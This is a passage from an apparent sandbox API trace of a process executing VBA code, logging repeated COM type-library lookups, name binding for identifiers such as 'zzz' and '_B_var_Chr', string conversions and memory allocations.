[1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.544] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.544] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3bf0) [0060.544] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.544] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.544] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.544] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.544] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.544] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.544] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.544] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="zzz") returned 0x50fbec [0060.544] strcpy_s (in: _Dst=0x33e4fb4760, _DstSize=0x4, _Src="zzz" | out: _Dst="zzz") returned 0x0 [0060.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb4760, cbMultiByte=4, lpWideCharStr=0x33e4fb45b0, cchWideChar=4 | out: lpWideCharStr="zzz") returned 4 [0060.544] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.544] ITypeLib:RemoteIsName (in: This=0x1d3980663b0, szNameBuf="zzz", lHashVal=0x50fbec, pfName=0x33e4fb4680, pBstrLibName=0x33e4fb45b0 | out: pfName=0x33e4fb4680*=0, pBstrLibName=0x33e4fb45b0) returned 0x0 [0060.544] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.544] IUnknown:AddRef (This=0x1d3985c4c00) returned 0x2a [0060.544] ITypeLib:RemoteIsName (in: This=0x1d3985c4c00, szNameBuf="zzz", lHashVal=0x50fbec, pfName=0x33e4fb4680, pBstrLibName=0x33e4fb45b0 | out: pfName=0x33e4fb4680*=0, pBstrLibName=0x33e4fb45b0) returned 0x0 [0060.544] IUnknown:Release (This=0x1d3985c4c00) returned 0x29 [0060.544] IUnknown:AddRef (This=0x1d3980655f0) returned 0xa [0060.544] ITypeLib:RemoteIsName (in: This=0x1d3980655f0, szNameBuf="zzz", lHashVal=0x50fbec, pfName=0x33e4fb4680, pBstrLibName=0x33e4fb45b0 | out: pfName=0x33e4fb4680*=0, pBstrLibName=0x33e4fb45b0) returned 0x0 [0060.544] IUnknown:Release (This=0x1d3980655f0) returned 0x9 [0060.544] IUnknown:AddRef (This=0x1d3985c5700) returned 0x7 [0060.544] ITypeLib:RemoteIsName (in: This=0x1d3985c5700, szNameBuf="zzz", lHashVal=0x50fbec, pfName=0x33e4fb4680, pBstrLibName=0x33e4fb45b0 | out: pfName=0x33e4fb4680*=0, pBstrLibName=0x33e4fb45b0) returned 0x0 [0060.545] IUnknown:Release (This=0x1d3985c5700) returned 0x6 [0060.545] IUnknown:Release (This=0x1d39d552b18) returned 0x6 [0060.545] IUnknown:Release (This=0x1d39d552b18) returned 0x5 [0060.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a32b2c4a, cbMultiByte=4, lpWideCharStr=0x33e4fb46e0, cchWideChar=5 | out: lpWideCharStr="zzz") returned 4 [0060.545] ITypeComp:RemoteBind (in: This=0x1d39d552b20, szName="zzz", lHashVal=0x50fbec, wFlags=0x5, ppTInfo=0x33e4fb4698, pDescKind=0x33e4fb46ac, ppFuncDesc=0x33e4fb46b0, ppVarDesc=0x7ffd09599971, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb4698*=0x0, pDescKind=0x33e4fb46ac*=0, ppFuncDesc=0x33e4fb46b0, ppVarDesc=0x7ffd09599971, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172e5e, cbMultiByte=4, lpWideCharStr=0x33e4fb4840, cchWideChar=5 | out: lpWideCharStr="zzz") returned 4 [0060.545] ITypeComp:RemoteBind (in: This=0x1d3980663c0, szName="zzz", lHashVal=0x50fbec, wFlags=0x5, ppTInfo=0x33e4fb47f8, pDescKind=0x33e4fb480c, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb47f8*=0x0, pDescKind=0x33e4fb480c*=0, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172e5e, cbMultiByte=4, lpWideCharStr=0x33e4fb4840, cchWideChar=5 | out: lpWideCharStr="zzz") returned 4 [0060.546] ITypeComp:RemoteBind (in: This=0x1d3985c4c10, szName="zzz", lHashVal=0x50fbec, wFlags=0x5, ppTInfo=0x33e4fb47f8, pDescKind=0x33e4fb480c, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb47f8*=0x0, pDescKind=0x33e4fb480c*=0, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172e5e, cbMultiByte=4, lpWideCharStr=0x33e4fb4840, cchWideChar=5 | out: lpWideCharStr="zzz") returned 4 [0060.546] ITypeComp:RemoteBind (in: This=0x1d398065600, szName="zzz", lHashVal=0x50fbec, wFlags=0x5, ppTInfo=0x33e4fb47f8, pDescKind=0x33e4fb480c, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb47f8*=0x0, pDescKind=0x33e4fb480c*=0, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.546] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="zzz") returned 0x50fbec [0060.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172e5e, cbMultiByte=4, lpWideCharStr=0x33e4fb4840, cchWideChar=5 | out: lpWideCharStr="zzz") returned 4 [0060.546] ITypeComp:RemoteBind (in: This=0x1d3985c5710, szName="zzz", lHashVal=0x50fbec, wFlags=0x5, ppTInfo=0x33e4fb47f8, pDescKind=0x33e4fb480c, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x7ffce09f40b8, ppTypeComp=0x1d300000000, pDummy=0x0 | out: ppTInfo=0x33e4fb47f8*=0x0, pDescKind=0x33e4fb480c*=0, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x7ffce09f40b8, ppTypeComp=0x1d300000000, pDummy=0x0) returned 0x0 [0060.546] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3e90 [0060.546] _mbscpy_s (in: _Dst=0x1d39dbb3e90, _DstSizeInBytes=0x4, _Src=0x1d3a3172e5e | out: _Dst=0x1d39dbb3e90) returned 0x0 [0060.546] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_zzz") returned 0x50b8fd [0060.546] strcpy_s (in: _Dst=0x33e4fb4950, _DstSize=0xb, _Src="_B_var_zzz" | out: _Dst="_B_var_zzz") returned 0x0 [0060.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb4950, cbMultiByte=11, lpWideCharStr=0x33e4fb47a0, cchWideChar=11 | out: lpWideCharStr="_B_var_zzz") returned 11 [0060.546] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.546] ITypeLib:RemoteIsName (in: This=0x1d3980663b0, szNameBuf="_B_var_zzz", lHashVal=0x50b8fd, pfName=0x33e4fb4870, pBstrLibName=0x33e4fb47a0 | out: pfName=0x33e4fb4870*=0, pBstrLibName=0x33e4fb47a0) returned 0x0 [0060.546] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.546] IUnknown:AddRef (This=0x1d3985c4c00) returned 0x2a [0060.546] ITypeLib:RemoteIsName (in: This=0x1d3985c4c00, szNameBuf="_B_var_zzz", lHashVal=0x50b8fd, pfName=0x33e4fb4870, pBstrLibName=0x33e4fb47a0 | out: pfName=0x33e4fb4870*=0, pBstrLibName=0x33e4fb47a0) returned 0x0 [0060.546] IUnknown:Release (This=0x1d3985c4c00) returned 0x29 [0060.546] IUnknown:AddRef (This=0x1d3980655f0) returned 0xa [0060.546] ITypeLib:RemoteIsName (in: This=0x1d3980655f0, szNameBuf="_B_var_zzz", lHashVal=0x50b8fd, pfName=0x33e4fb4870, pBstrLibName=0x33e4fb47a0 | out: pfName=0x33e4fb4870*=0, pBstrLibName=0x33e4fb47a0) returned 0x0 [0060.546] IUnknown:Release (This=0x1d3980655f0) returned 0x9 [0060.546] IUnknown:AddRef (This=0x1d3985c5700) returned 0x7 [0060.546] ITypeLib:RemoteIsName (in: This=0x1d3985c5700, szNameBuf="_B_var_zzz", lHashVal=0x50b8fd, pfName=0x33e4fb4870, pBstrLibName=0x33e4fb47a0 | out: pfName=0x33e4fb4870*=0, pBstrLibName=0x33e4fb47a0) returned 0x0 [0060.547] IUnknown:Release (This=0x1d3985c5700) returned 0x6 [0060.547] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.547] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172faa, cbMultiByte=11, lpWideCharStr=0x33e4fb4800, cchWideChar=12 | out: lpWideCharStr="_B_var_zzz") returned 11 [0060.547] ITypeComp:RemoteBind (in: This=0x1d3980663c0, szName="_B_var_zzz", lHashVal=0x50b8fd, wFlags=0x5, ppTInfo=0x33e4fb47b8, pDescKind=0x33e4fb47cc, ppFuncDesc=0x33e4fb47d0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb47b8*=0x0, pDescKind=0x33e4fb47cc*=0, ppFuncDesc=0x33e4fb47d0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.547] _mbscpy_s (in: _Dst=0x33e4fb49c0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e5e | out: _Dst=0x33e4fb49c0) returned 0x0 [0060.547] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3e90) [0060.547] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d7d2670, cb=0x180) returned 0x1d39d9f95f0 [0060.547] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3d80000 [0060.548] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3810 [0060.548] _mbscpy_s (in: _Dst=0x1d39dbb3810, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3810) returned 0x0 [0060.548] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.548] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.548] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.548] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.548] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.548] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.548] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.548] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3810) [0060.548] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.548] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.548] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.548] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.548] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.549] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.549] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.549] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3d90000 [0060.549] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3c90 [0060.549] _mbscpy_s (in: _Dst=0x1d39dbb3c90, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3c90) returned 0x0 [0060.549] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.549] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.549] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.549] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.549] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.549] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.549] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.550] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3c90) [0060.550] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.550] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.550] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.550] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.550] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.550] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.550] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.550] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3bb0 [0060.550] _mbscpy_s (in: _Dst=0x1d39dbb3bb0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3bb0) returned 0x0 [0060.550] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.550] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.550] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.550] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.550] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.550] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.550] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.550] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3bb0) [0060.550] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.550] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.550] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.550] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.550] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.550] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.550] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.550] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3c90 [0060.551] _mbscpy_s (in: _Dst=0x1d39dbb3c90, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3c90) returned 0x0 [0060.551] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.551] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.551] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.551] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.551] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.551] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.551] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.551] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3c90) [0060.551] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.551] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.551] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.551] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.551] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.551] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.551] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.551] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb37d0 [0060.551] _mbscpy_s (in: _Dst=0x1d39dbb37d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb37d0) returned 0x0 [0060.551] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.551] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.551] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.551] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.551] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.551] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.551] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.551] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb37d0) [0060.552] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.552] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.552] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.552] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.552] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, 